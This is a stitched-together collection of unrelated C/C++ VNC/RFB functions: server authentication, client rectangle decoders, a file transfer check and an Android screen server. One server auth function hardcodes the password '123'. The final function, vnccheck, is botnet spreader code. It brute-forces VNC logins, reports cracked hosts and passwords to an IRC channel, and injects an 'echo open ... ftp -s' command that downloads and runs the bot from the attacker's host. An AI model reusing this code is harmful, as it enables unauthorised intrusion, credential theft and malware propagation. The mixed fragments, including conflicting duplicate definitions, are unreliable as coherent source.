// =========================================================================
// 函数功能:处理客户端对挑战信息的响应
// 输入参数:待交流的客户端cl
// 输出参数:
// 返回值 :
// 说明 :当响应消息失败时,3.7以上的版本会发送失败的原因,而3.7及其以下会直接
// 关闭客户端
// =========================================================================
void rfbAuthProcessClientMessage(rfbClientPtr cl)
{
char *passwd="123";
int n;
u8 response[CHALLENGESIZE];
u32 authResult;
if ((n = ReadExact(cl, (char *)response, CHALLENGESIZE)) <= 0) {
if (n != 0)
debug_printf("rfbAuthProcessClientMessage: read");
rfbCloseClient(cl);
return;
}
rfbEncryptBytes(cl->authChallenge, passwd);
if (memcmp(cl->authChallenge, response, CHALLENGESIZE) != 0) {
debug_printf("rfbAuthProcessClientMessage: authentication failed from %s\n",
cl->host);
authResult = Swap32IfLE(rfbVncAuthFailed);
if (WriteExact(cl, (char *)&authResult, 4) < 0) {
debug_printf("rfbAuthProcessClientMessage: write");
rfbClientSendString(cl,"challengdge failed\n");
}
rfbCloseClient(cl);
return;
}
else
{
debug_printf("challendge success ---cl=%s",cl->host);
}
authResult = Swap32IfLE(rfbVncAuthOK);
if (WriteExact(cl, (char *)&authResult, 4) < 0) {
debug_printf("rfbAuthProcessClientMessage: write");
rfbCloseClient(cl);
return;
}
cl->state = RFB_INITIALISATION;
}
void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) {
UINT numpixels = pfburh->r.w * pfburh->r.h;
// this assumes at least one byte per pixel. Naughty.
UINT numRawBytes = numpixels * m_minPixelBytes;
UINT numCompBytes;
lzo_uint new_len;
rfbZlibHeader hdr;
// Read in the rfbZlibHeader
omni_mutex_lock l(m_bitmapdcMutex);
ReadExact((char *)&hdr, sz_rfbZlibHeader);
numCompBytes = Swap32IfLE(hdr.nBytes);
// Read in the compressed data
CheckBufferSize(numCompBytes);
ReadExact(m_netbuf, numCompBytes);
CheckZlibBufferSize(numRawBytes);
lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL);
SoftCursorLockArea(pfburh->r.x, pfburh->r.y,pfburh->r.w,pfburh->r.h);
if (!Check_Rectangle_borders(pfburh->r.x, pfburh->r.y,pfburh->r.w,pfburh->r.h)) return;
if (m_DIBbits) ConvertAll(pfburh->r.w,pfburh->r.h,pfburh->r.x, pfburh->r.y,m_myFormat.bitsPerPixel/8,(BYTE *)m_zlibbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth);
}
//
// sf@2002
// - Read a cache rects zipped block coming from the server
// - Restore all these cache rects on the screen
void ClientConnection::ReadCacheZip(rfbFramebufferUpdateRectHeader *pfburh,HRGN *prgn)
{
UINT nNbCacheRects = pfburh->r.x;
UINT numRawBytes = nNbCacheRects * sz_rfbRectangle;
numRawBytes += (numRawBytes/100) + 8;
UINT numCompBytes;
rfbZlibHeader hdr;
// Read in the rfbZlibHeader
ReadExact((char *)&hdr, sz_rfbZlibHeader);
numCompBytes = Swap32IfLE(hdr.nBytes);
// Check the net buffer
CheckBufferSize(numCompBytes);
// Read the compressed data
ReadExact((char *)m_netbuf, numCompBytes);
// Verify buffer space for cache rects list
CheckZipBufferSize(numRawBytes);
int nRet = uncompress((unsigned char*)m_zipbuf,// Dest
(unsigned long*)&numRawBytes,// Dest len
(unsigned char*)m_netbuf, // Src
numCompBytes // Src len
);
if (nRet != 0)
{
return;
}
// Read all the cache rects
rfbRectangle theRect;
BYTE* p = m_zipbuf;
for (UINT i = 0 ; i < nNbCacheRects; i++)
{
memcpy((BYTE*)&theRect, p, sz_rfbRectangle);
p += sz_rfbRectangle;
RECT cacherect;
cacherect.left = Swap16IfLE(theRect.x);
cacherect.right = Swap16IfLE(theRect.x) + Swap16IfLE(theRect.w);
cacherect.top = Swap16IfLE(theRect.y);
cacherect.bottom = Swap16IfLE(theRect.y) + Swap16IfLE(theRect.h);
SoftCursorLockArea(cacherect.left, cacherect.top, cacherect.right - cacherect.left, cacherect.bottom - cacherect.top);
RestoreArea(cacherect);
InvalidateRegion(&cacherect,prgn);
}
}
void ClientConnection::ReadUltraZip(rfbFramebufferUpdateRectHeader *pfburh,HRGN *prgn)
{
UINT nNbCacheRects = pfburh->r.x;
UINT numRawBytes = pfburh->r.y+pfburh->r.w*65535;
UINT numCompBytes;
lzo_uint new_len;
rfbZlibHeader hdr;
// Read in the rfbZlibHeader
omni_mutex_lock l(m_bitmapdcMutex);
ReadExact((char *)&hdr, sz_rfbZlibHeader);
numCompBytes = Swap32IfLE(hdr.nBytes);
// Check the net buffer
CheckBufferSize(numCompBytes);
// Read the compressed data
ReadExact((char *)m_netbuf, numCompBytes);
// Verify buffer space for cache rects list
CheckZlibBufferSize(numRawBytes+500);
lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL);
BYTE* pzipbuf = m_zlibbuf;
for (UINT i = 0 ; i < nNbCacheRects; i++)
{
rfbFramebufferUpdateRectHeader surh;
memcpy((char *) &surh,pzipbuf, sz_rfbFramebufferUpdateRectHeader);
surh.r.x = Swap16IfLE(surh.r.x);
surh.r.y = Swap16IfLE(surh.r.y);
surh.r.w = Swap16IfLE(surh.r.w);
surh.r.h = Swap16IfLE(surh.r.h);
surh.encoding = Swap32IfLE(surh.encoding);
pzipbuf += sz_rfbFramebufferUpdateRectHeader;
RECT rect;
rect.left = surh.r.x;
rect.right = surh.r.x + surh.r.w;
rect.top = surh.r.y;
rect.bottom = surh.r.y + surh.r.h;
//border check
if (!Check_Rectangle_borders(rect.left,rect.top,surh.r.w,surh.r.h)) return;
SoftCursorLockArea(rect.left, rect.top, rect.right - rect.left, rect.bottom - rect.top);
if ( surh.encoding==rfbEncodingRaw)
{
UINT numpixels = surh.r.w * surh.r.h;
if (m_DIBbits) ConvertAll(surh.r.w,surh.r.h,surh.r.x, surh.r.y,m_myFormat.bitsPerPixel/8,(BYTE *)pzipbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth);
pzipbuf +=numpixels*m_myFormat.bitsPerPixel/8;
if (!m_opts.m_Directx)InvalidateRegion(&rect,prgn);
}
}
}
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh)
{
rfbCopyRect cr;
double tBlitStart;
ReadExact((char *) &cr, sz_rfbCopyRect);
cr.srcX = Swap16IfLE(cr.srcX);
cr.srcY = Swap16IfLE(cr.srcY);
// If *Cursor encoding is used, we should extend our "cursor lock area"
// (previously set to destination rectangle) to the source rect as well.
SoftCursorLockArea(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h);
omni_mutex_lock l(m_bitmapdcMutex);
ObjectSelector b(m_hBitmapDC, m_hBitmap);
PaletteSelector p(m_hBitmapDC, m_hPalette);
if (m_opts.m_benchFile) tBlitStart = getTime();
if (!BitBlt(m_hBitmapDC, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h,
m_hBitmapDC, cr.srcX, cr.srcY, SRCCOPY))
vnclog.Print(0, "Error in blit in ClientConnection::CopyRect\n");
if (m_opts.m_benchFile) tBlit += getTime() - tBlitStart;
}
bool CFileSender::QueryStatus()
{
if (!PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_QUERYSTATUS))
{
return false;
}
int nDataToRead = sizeof(FilePackHeader);
FilePackHeader header;
if (!ReadExact(m_Socket,(char *) &header, nDataToRead))
{
MessageBox(m_ParentHwnd, "发送本地文件数据失败!", "提示", MB_OK | MB_ICONEXCLAMATION);
return false;
}
FilePackHeader header1;
if (!ReadExact(m_Socket,(char *) &header1, nDataToRead))
{
MessageBox(m_ParentHwnd, "发送本地文件数据失败!", "提示", MB_OK | MB_ICONEXCLAMATION);
return false;
}
if(header1.nParam == CMD_PARAM_TRANSFILE_SSTOPRECEIVE && header1.nType != FILE_RESPONSE)
{
bool bStopByClient = false;
SendMessage(m_ParentHwnd, WM_GETSTOPBYMYSEFLT, 0, (LPARAM)&bStopByClient);
if(m_bStopbyServer == false && !bStopByClient)
{
m_bStopbyServer = true;
PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_STOP);
PostMessage(this->m_ParentHwnd, WM_FILE_STOP, 0, 0);
}
return false;
}
if (header.nType != FILE_RESPONSE || header.nParam != CMD_PARAM_TRANSFILE_C2S_STATUSOK)
{
PackAndSendRequest(CMD_PARAM_TRANSFILE_C2S_STOP);
PostMessage(m_ParentHwnd, WM_FILE_ERROR, 1, 0);
return false;
}
return true;
}
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh) {
rfbCopyRect cr;
ReadExact((char *) &cr, sz_rfbCopyRect);
cr.srcX = Swap16IfLE(cr.srcX);
cr.srcY = Swap16IfLE(cr.srcY);
// By sure the rect is insite the border memcopy does not like it
if (!Check_Rectangle_borders(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)) return;
if (!Check_Rectangle_borders(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h)) return;
// tight If *Cursor encoding is used, we should extend our "cursor lock area"
// (previously set to destination rectangle) to the source rect as well.
SoftCursorLockArea(cr.srcX, cr.srcY, pfburh->r.w, pfburh->r.h);
if (m_DIBbits)
{
omni_mutex_lock l(m_bitmapdcMutex);
int bytesPerInputRow = m_si.framebufferWidth * m_myFormat.bitsPerPixel/8;
int bytesPerOutputRow = pfburh->r.w * m_myFormat.bitsPerPixel/8;
int OutputHeight=pfburh->r.h;
BYTE *sourcepos,*iptr,*destpos,*optr;
if (cr.srcY<=pfburh->r.y)
{
{
destpos = (BYTE*)m_DIBbits + (bytesPerInputRow * (pfburh->r.y+pfburh->r.h-1))+(pfburh->r.x * m_myFormat.bitsPerPixel/8);
sourcepos = (BYTE*)m_DIBbits + (bytesPerInputRow * (cr.srcY+pfburh->r.h-1))+((cr.srcX) * m_myFormat.bitsPerPixel/8);
iptr=sourcepos;
optr=destpos;
while (OutputHeight > 0) {
memcpy(optr, iptr, bytesPerOutputRow);
iptr -= bytesPerInputRow;
optr -= bytesPerInputRow;
OutputHeight--;
}
}
}
else if (cr.srcY>pfburh->r.y)
{
{
destpos = (BYTE*)m_DIBbits + (bytesPerInputRow * pfburh->r.y)+(pfburh->r.x * m_myFormat.bitsPerPixel/8);
sourcepos = (BYTE*)m_DIBbits + (bytesPerInputRow * (cr.srcY))+((cr.srcX) * m_myFormat.bitsPerPixel/8);
iptr=sourcepos;
optr=destpos;
while (OutputHeight > 0) {
memcpy(optr, iptr, bytesPerOutputRow);
iptr += bytesPerInputRow;
optr += bytesPerInputRow;
OutputHeight--;
}
}
}
}
}
void ClientConnection::ReadCacheRect(rfbFramebufferUpdateRectHeader *pfburh)
{
rfbCacheRect cr;
ReadExact((char *) &cr, sz_rfbCacheRect);
cr.special = Swap16IfLE(cr.special);
RECT rect;
rect.left=pfburh->r.x;
rect.right=pfburh->r.x+pfburh->r.w;
rect.top=pfburh->r.y;
rect.bottom=pfburh->r.y+pfburh->r.h;
RestoreArea(rect);
}
// =========================================================================
// 函数功能:处理客户端的安全类型信息
// 输入参数:待交流的客户端cl
// 输出参数:
// 返回值 :
// 说明 : 只有3.7及其以上版本的server才会让cl选择安全类型
// =========================================================================void
void rfbProcessClientSecurityType(rfbClientPtr cl)
{
int n;
u8 chosenType;
u32 authResult;
/* Read the security type. */
n = ReadExact(cl, (char *)&chosenType, 1);
if (n <= 0) {
if (n == 0)
debug_printf("rfbProcessClientSecurityType: client gone\n");
else
debug_printf("rfbProcessClientSecurityType: read");
rfbCloseClient(cl);
return;
}
/* Make sure it was present in the list sent by the server. */
switch (chosenType)
{
case rfbConnFailed:
debug_printf("The client %s connfailed!\n",cl->host);
cl->state = RFB_INITIALISATION;
break;
case rfbNoAuth:
debug_printf("The client %s need no auth!\n",cl->host);
//对于3.8版本仍然需要把结果返还回去
if((cl->protocolMajorVersion==3)&&(cl->protocolMinorVersion>7))
{
authResult = Swap32IfLE(rfbVncAuthOK);
if (WriteExact(cl, (char *)&authResult, 4) < 0) {
debug_printf("rfbAuthProcessClientMessage: write");
rfbCloseClient(cl);
break;
}
}
cl->state = RFB_INITIALISATION;
break;
case rfbVncAuth:
debug_printf("The client %s need vncauth!\n",cl->host);
rfbVncAuthSendChallenge(cl);//发送挑战信息
break;
default:
debug_printf("No supported security method--%d\n",chosenType);
rfbCloseClient(cl);
break;
}
return;
}
void ClientConnection::ReadCopyRect(rfbFramebufferUpdateRectHeader *pfburh) {
rfbCopyRect cr;
ReadExact((char *) &cr, sz_rfbCopyRect);
cr.srcX = Swap16IfLE(cr.srcX);
cr.srcY = Swap16IfLE(cr.srcY);
omni_mutex_lock l(m_bitmapdcMutex);
ObjectSelector b(m_hBitmapDC, m_hBitmap);
PaletteSelector p(m_hBitmapDC, m_hPalette);
if (!BitBlt(
m_hBitmapDC,pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h,
m_hBitmapDC, cr.srcX, cr.srcY, SRCCOPY)) {
log.Print(0, _T("Error in blit in ClientConnection::CopyRect\n"));
}
}
static void rfbProcessClientInitMessage(rfbClientPtr cl)
{
rfbClientInitMsg ci;
char buf[256];
rfbServerInitMsg *si = (rfbServerInitMsg *)buf;
int len, n;
if ((n = ReadExact(cl, (char *)&ci,sz_rfbClientInitMsg)) <= 0) {
if (n == 0)
debug_printf("rfbProcessClientInitMessage: client gone\n");
else
debug_printf("rfbProcessClientInitMessage: read");
rfbCloseClient(cl);
return;
}
si->framebufferWidth = Swap16IfLE(cl->screen->width);
si->framebufferHeight = Swap16IfLE(cl->screen->height);
debug_printf("width=%d hieght=%d\n",cl->screen->width,cl->screen->height);
si->format = cl->screen->rfbServerFormat;
si->format.redMax = Swap16IfLE(si->format.redMax);
si->format.greenMax = Swap16IfLE(si->format.greenMax);
si->format.blueMax = Swap16IfLE(si->format.blueMax);
if (strlen(cl->screen->desktopName) > 128) /* sanity check on desktop name len */
cl->screen->desktopName[128] = 0;
strcpy(buf + sz_rfbServerInitMsg, cl->screen->desktopName);
len = strlen(buf + sz_rfbServerInitMsg);
si->nameLength = Swap32IfLE(len);
if (WriteExact(cl, buf, sz_rfbServerInitMsg + len) < 0) {
debug_printf("rfbProcessClientInitMessage: write");
rfbCloseClient(cl);
return;
}
cl->state = RFB_NORMAL;
if(ci.shared)
{
debug_printf("The client permit share!\n");
}
else
{
debug_printf("The client refused share!\n");
}
//关于是否共享的问题,以后再谈
}
static void rfbProcessClientProtocolVersion(rfbClientPtr cl)
{
rfbProtocolVersionMsg pv;
int n, major, minor;
char failureReason[256];
if ((n = ReadExact(cl, pv, sz_rfbProtocolVersionMsg)) <= 0) {
if (n == 0)
debug_printf("rfbProcessClientProtocolVersion: client gone\n");
else
debug_printf("rfbProcessClientProtocolVersion: read");
rfbCloseClient(cl);
return;
}
pv[sz_rfbProtocolVersionMsg] = 0;
if (sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) {
debug_printf("rfbProcessClientProtocolVersion: not a valid RFB client\n");
rfbCloseClient(cl);
return;
}
debug_printf("Protocol version %d.%d\n", major, minor);
if (major != rfbProtocolMajorVersion) {
/* Major version mismatch - send a ConnFailed message */
debug_printf("Major version mismatch\n");
sprintf(failureReason,
"RFB protocol version mismatch - server %d.%d, client %d.%d",
rfbProtocolMajorVersion,rfbProtocolMinorVersion,major,minor);
rfbClientConnFailed(cl, failureReason);
return;
}
if (minor != rfbProtocolMinorVersion) {
/* Minor version mismatch - warn but try to continue */
debug_printf("Ignoring minor version mismatch\n");
}
//每个客户端都会发送自己的proto
cl->protocolMajorVersion=major;
cl->protocolMinorVersion=minor;
rfbAuthNewClient(cl);
}
void ClientConnection::ReadRawRect(rfbFramebufferUpdateRectHeader *pfburh) {
UINT numpixels = pfburh->r.w * pfburh->r.h;
// this assumes at least one byte per pixel. Naughty.
UINT numbytes = numpixels * m_minPixelBytes;
// Read in the whole thing
CheckBufferSize(numbytes);
ReadExact(m_netbuf, numbytes);
if (UltraFast && m_DIBbits)
{
boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex);
ConvertAll(pfburh->r.w,pfburh->r.h,pfburh->r.x, pfburh->r.y,m_myFormat.bitsPerPixel/8,(BYTE *)m_netbuf,(BYTE *)m_DIBbits,m_si.framebufferWidth);
return;
}
SETUP_COLOR_SHORTCUTS;
{
// No other threads can use bitmap DC
boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex);
ObjectSelector b(m_hBitmapDC, m_hBitmap); \
PaletteSelector p(m_hBitmapDC, m_hPalette); \
// This big switch is untidy but fast
switch (m_myFormat.bitsPerPixel) {
case 8:
SETPIXELS(m_netbuf, 8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 16:
SETPIXELS(m_netbuf, 16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 24:
case 32:
SETPIXELS(m_netbuf, 32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
default:
//vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel);
Log.Add(_ERROR_, "Invalid number of bits per pixel: %d", m_myFormat.bitsPerPixel);
return;
}
}
}
int
SkipExact(rfbClientPtr cl, int len)
{
char *tmpbuf = NULL;
int bufLen = min(len, 65536), i, retval = 1;
tmpbuf = (char *)malloc(bufLen);
if (tmpbuf == NULL) {
rfbLogPerror("SkipExact: out of memory");
return -1;
}
for (i = 0; i < len; i += bufLen) {
retval = ReadExact(cl, tmpbuf, min(bufLen, len - i));
if (retval <= 0) break;
}
free(tmpbuf);
return retval;
}
void ClientConnection::ReadRawRect(rfbFramebufferUpdateRectHeader *pfburh) {
UINT numpixels = pfburh->r.w * pfburh->r.h;
// this assumes at least one byte per pixel. Naughty.
UINT numbytes = numpixels * m_minPixelBytes;
// Read in the whole thing
CheckBufferSize(numbytes);
ReadExact(m_netbuf, numbytes);
SETUP_COLOR_SHORTCUTS;
{
// No other threads can use bitmap DC
omni_mutex_lock l(m_bitmapdcMutex);
ObjectSelector b(m_hBitmapDC, m_hBitmap); \
PaletteSelector p(m_hBitmapDC, m_hPalette); \
// This big switch is untidy but fast
switch (m_myFormat.bitsPerPixel) {
case 8:
SETPIXELS(m_netbuf, 8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 16:
SETPIXELS(m_netbuf, 16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
case 24:
case 32:
SETPIXELS(m_netbuf, 32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h)
break;
default:
vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel);
return;
}
}
}
Bool
InitialiseRFBConnection(int sock)
{
rfbProtocolVersionMsg pv;
int major,minor;
Bool authWillWork = True;
CARD32 authScheme, reasonLen, authResult;
char *reason;
CARD8 challenge[CHALLENGESIZE];
char *passwd;
int i;
rfbClientInitMsg ci;
/* if the connection is immediately closed, don't report anything, so
that pmw's monitor can make test connections */
if(listenSpecified)
errorMessageFromReadExact = False;
if(!ReadExact(sock, pv, sz_rfbProtocolVersionMsg)) return False;
errorMessageFromReadExact = True;
pv[sz_rfbProtocolVersionMsg] = 0;
if(sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2)
{
fprintf(stderr,"%s: Not a valid VNC server\n",programName);
return False;
}
fprintf(stderr,"%s: VNC server supports protocol version %d.%d "
"(viewer %d.%d)\n",
programName,major,minor,rfbProtocolMajorVersion,
rfbProtocolMinorVersion);
if((major == 3) && (minor < 3))
{
/* if server is before 3.3 authentication won't work */
authWillWork = False;
}
else
{
/* any other server version, just tell it what we want */
major = rfbProtocolMajorVersion;
minor = rfbProtocolMinorVersion;
}
sprintf(pv,rfbProtocolVersionFormat,major,minor);
if(!WriteExact(sock, pv, sz_rfbProtocolVersionMsg)) return False;
if(!ReadExact(sock, (char *)&authScheme, 4)) return False;
authScheme = Swap32IfLE(authScheme);
switch(authScheme)
{
case rfbConnFailed:
if(!ReadExact(sock, (char *)&reasonLen, 4)) return False;
reasonLen = Swap32IfLE(reasonLen);
reason = malloc(reasonLen);
if(!ReadExact(sock, reason, reasonLen))
{
free(reason);
return False;
}
fprintf(stderr,"%s: VNC connection failed: %.*s\n",
programName, (int)reasonLen, reason);
free(reason);
return False;
case rfbNoAuth:
fprintf(stderr,"%s: No authentication needed\n",programName);
break;
case rfbVncAuth:
if(!authWillWork)
{
fprintf(stderr,
"\n%s: VNC server uses the old authentication scheme.\n"
"You should kill your old desktop(s) and restart.\n"
"If you really need to connect to this desktop use "
"vncviewer3.2\n\n",
programName);
return False;
}
if(!ReadExact(sock, (char *)challenge, CHALLENGESIZE)) return False;
if(passwdFile)
{
passwd = vncDecryptPasswdFromFile(passwdFile);
if(passwd == NULL)
return False;
}
else
{
passwd = passwdString;
if(strlen(passwd) > 8)
{
passwd[8] = '\0';
}
}
vncEncryptBytes(challenge, passwd);
/* Lose the password from memory */
for(i=0; i<strlen(passwd); i++)
{
passwd[i] = '\0';
}
if(!WriteExact(sock, challenge, CHALLENGESIZE)) return False;
if(!ReadExact(sock, (char *)&authResult, 4)) return False;
authResult = Swap32IfLE(authResult);
switch(authResult)
{
case rfbVncAuthOK:
fprintf(stderr,"%s: VNC authentication succeeded\n",programName);
break;
case rfbVncAuthFailed:
fprintf(stderr,"%s: VNC authentication failed\n",programName);
return False;
case rfbVncAuthTooMany:
fprintf(stderr,"%s: VNC authentication failed - too many tries\n",
programName);
return False;
default:
fprintf(stderr,"%s: Unknown VNC authentication result: %d\n",
programName,(int)authResult);
return False;
}
break;
default:
fprintf(stderr,
"%s: Unknown authentication scheme from VNC server: %d\n",
programName,(int)authScheme);
return False;
}
ci.shared = (shareDesktop ? 1 : 0);
if(!WriteExact(sock, (char *)&ci, sz_rfbClientInitMsg)) return False;
if(!ReadExact(sock, (char *)&si, sz_rfbServerInitMsg)) return False;
si.framebufferWidth = Swap16IfLE(si.framebufferWidth);
si.framebufferHeight = Swap16IfLE(si.framebufferHeight);
si.format.redMax = Swap16IfLE(si.format.redMax);
si.format.greenMax = Swap16IfLE(si.format.greenMax);
si.format.blueMax = Swap16IfLE(si.format.blueMax);
si.nameLength = Swap32IfLE(si.nameLength);
desktopName = malloc(si.nameLength + 1);
if(!ReadExact(sock, desktopName, si.nameLength))
{
free(desktopName);
return False;
}
desktopName[si.nameLength] = 0;
fprintf(stderr,"%s: Desktop name \"%s\"\n",programName,desktopName);
free(desktopName);
fprintf(stderr,
"%s: Connected to VNC server, using protocol version %d.%d\n",
programName, rfbProtocolMajorVersion, rfbProtocolMinorVersion);
fprintf(stderr,"%s: VNC server default format:\n",programName);
PrintPixelFormat(&si.format);
return True;
}
inline void ReadString(SOCKET s_sock, char *buf, int length)
{
if (length > 0)
ReadExact(s_sock, buf, length);
buf[length] = '\0';
}
/*
* abcdefghijklmnopqrstuvwxyz
* e hi klmno q t u
* | || ||||| | | |
* | || ||||| | | +get screen (full res)
* | || ||||| | + touch(down,x,y)
* | || ||||| +quit client
* | || ||||+ftp_err
* | || |||+ftp_data
* | || ||+ftp_upload_req
* | || |+ftp_download_req
* | || +ftp_filelist_req
* | |+get screen info
* | +get screen (half req)
* +stop service
*/
static int ProcessClientMessage(svcInfoPtr psvc, FBCCMD* pmsg)
{
//FBCCMD msg;
//char msg;
int n = 0;
int nSize;
//if( (n = ReadExact(psvc, (char*)&msg, FBCCMD_HEADER)) <= 0 ) {
// Err("ProcessClientMessage : read(%d)\n", n);
// return false;
//}
pmsg->size = ntohl(pmsg->size);
pmsg->size -= FBCCMD_HEADER;
//Log("msg received(%c: size - %d)\n", pmsg->cmd, pmsg->size);
if( pmsg->size > 0) {
pmsg->data = (char*)malloc(pmsg->size);
if( (n = ReadExact(psvc, (char*)pmsg->data, pmsg->size)) <= 0 ) {
Err("ProcessClientMessage : read(%d)\n", n);
return false;
}
}
//Log("after alloc %02x %02x %02x %02x\n", msg.data[0],msg.data[1],msg.data[2],msg.data[3]);
unsigned int data;
#ifdef PERFORMANCE_REPORT
struct timeval tS, tE;
gettimeofday(&tS,NULL);
psvc->frame_client += ELAPSED(tLast, tS);
#endif
switch(pmsg->cmd) {
case 'i':
{
FBCCMD_SCRINFO res;
res.cmd = 'i';
res.size = htonl(sizeof(FBCCMD_SCRINFO));
res.width = htonl(g_fbinfo.width);
res.height = htonl(g_fbinfo.height);
res.bpp = htonl(g_fbinfo.bpp);
res.touchfd = htonl( (touchfd != -1 ) ? 1 : 0);
LOCK(psvc->output_mutex);
int rtn = WriteExact(psvc, (const char*)&res, sizeof(FBCCMD_SCRINFO));
UNLOCK(psvc->output_mutex);
//Log("response i %d to :%d\n", res.size, rtn);
}
break;
case 'u':
//Log("signal-u\n");
g_halfmode = 0;
//TSIGNAL(psvc->updateCond);
read_rgb_framebuffer_to_jpeg(psvc);
#ifdef PERFORMANCE_REPORT
gettimeofday(&tE,NULL);
psvc->frame_total += ELAPSED(tS, tE);
tS = tE;
#endif
break;
case 'h':
g_halfmode = 1;
//Log("signal-h\n");
//TSIGNAL(psvc->updateCond);
//g_halfmode = 0;
read_rgb_framebuffer_to_jpeg(psvc);
#ifdef PERFORMANCE_REPORT
gettimeofday(&tE,NULL);
psvc->frame_total += ELAPSED(tS, tE);
tS = tE;
#endif
break;
case 'e':
return false;
break;
case 'q':
ExitClient(psvc);
ShutdownSockets(psvc);
break;
// ftp
case 'k': // ftp filestlist req
onFilelistReq(psvc, pmsg);
break;
case 'l': // ftp filedownload req
onFileDownloadReq(psvc, pmsg);
break;
case 'm': // ftp fileupload req
onFileUploadReq(psvc, pmsg);
break;
case 'n': // ftp fileupload data
//Log("case n\n");
onFileMsg(psvc, pmsg);
break;
case 'o': // ftp fileerr
onFileErr(psvc, pmsg);
break;
case 't':
onTouch(psvc, pmsg);
break;
}
if( pmsg->size > 0) {
free(pmsg->data);
}
//if(( psvc->frame_sent++ % 5) == 0) {
// g_fbinfo.orientation = get_dev_rotation();
// //int isScreenOn = get_screen_on();
// //Log("isScreenOn(%d)\n",isScreenOn);
//}
#ifdef PERFORMANCE_REPORT
if( (psvc->frame_sent % 10) == 0)
{
double frame_total;
double frame_capture;
double frame_compress;
double frame_colorspace;
double frame_tx;
double frame_client;
double fps, fps_svr;
fps = (double)10 * 1000000 / (psvc->frame_total + psvc->frame_client);
fps_svr = (double)10 * 1000000 / psvc->frame_total;
frame_total = psvc->frame_total / 10000;
frame_capture = psvc->frame_capture / 10000;
frame_compress = psvc->frame_compress / 10000;
frame_colorspace = psvc->frame_colorspace / 10000;
frame_tx = psvc->frame_tx / 10000;
frame_client = psvc->frame_client / 10000;
if( psvc->frame_sent > 10 )
{
Log("FPS(%5.2f),SVR(%4.1f) TOT(%3.0f),CAP(%3.0f),ZIP(%3.0f),CNV(%2.0f),TX(%2.0f),CLI(%2.0f)\n",
//psvc->frame_sent-1,
fps, fps_svr,
frame_total, frame_capture, frame_compress, frame_colorspace, frame_tx,frame_client);
}
psvc->frame_total = 0;
psvc->frame_capture = 0;
psvc->frame_compress = 0;
psvc->frame_colorspace = 0;
psvc->frame_tx = 0;
psvc->frame_client = 0;
}
gettimeofday(&tLast,NULL);
#endif /* PERFORMANCE_REPORT */
// Log("end loop");
return true;
}
int vnccheck(char *host, char *passwd, SOCKET ircconn) {
SOCKET sock;
SOCKADDR_IN ssin;
ssin.sin_family = AF_INET;
ssin.sin_port = htons(5900);
ssin.sin_addr.s_addr= inet_addr(host);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
//printf("[-] Could not connect\n");
return 1;
}
char buff[4096];
char ftpline[256];
sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME);
unsigned char vncversion[12];
ReadExact(sock, vncversion, sizeof(vncversion));
if(strstr(vncversion, "RFB")) {
WriteExact(sock, vncversion, sizeof(vncversion));
strtok(vncversion, " ");
int versa = atoi(strtok(NULL, "."));
int versb = atoi(strtok(NULL, "\n"));
//printf("[+] Found VNC %d.%d\n", versa, versb);
char auth[4];
ReadExact(sock, auth, 4);
if(auth[1] == 1 || auth[3] == 1) {
//printf("[+] VNC NoAuth!\n");
sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host);
send(ircconn,buff, strlen(buff), 0);
WriteExact(sock, "\0", 1);
VNCRoot(sock, ftpline);
closesocket(sock);
return 1;
}
else if(auth[1] == 2 || auth[3] == 2) {
//printf("[+] VNC needs pass lets brewtf0rc3\n");
char funk[1];
//funk = "0\n";
funk[0] = auth[1];
//funk[1] = '\n';
//printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]);
WriteExact(sock, funk, 1); // WTF? I NEED 2 send sumthing or ill not get the challenge
unsigned char challenge[16];
ReadExact(sock, challenge, 16);
vncEncryptBytes(challenge, passwd);
WriteExact(sock, challenge, 16); // send encrypted shit
// see wtf the status is
unsigned char status[4];
ReadExact(sock, status, 4);
if(status[3] == 0) {
//printf("[+] pass ok\n");
sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host);
send(ircconn,buff, strlen(buff), 0);
WriteExact(sock, "\0", 1);
VNCRoot(sock, ftpline);
closesocket(sock);
return 1;
}
else if(status[3] == 1) {
//printf("[-] pass wrong\n");
return 0;
}
else if(status[3] == 1) {
//printf("[-] 2much connections\n");
return 2;
}
}
else if(auth[1] ==0) {
return 1;
}
}
closesocket(sock);
return 0;
}
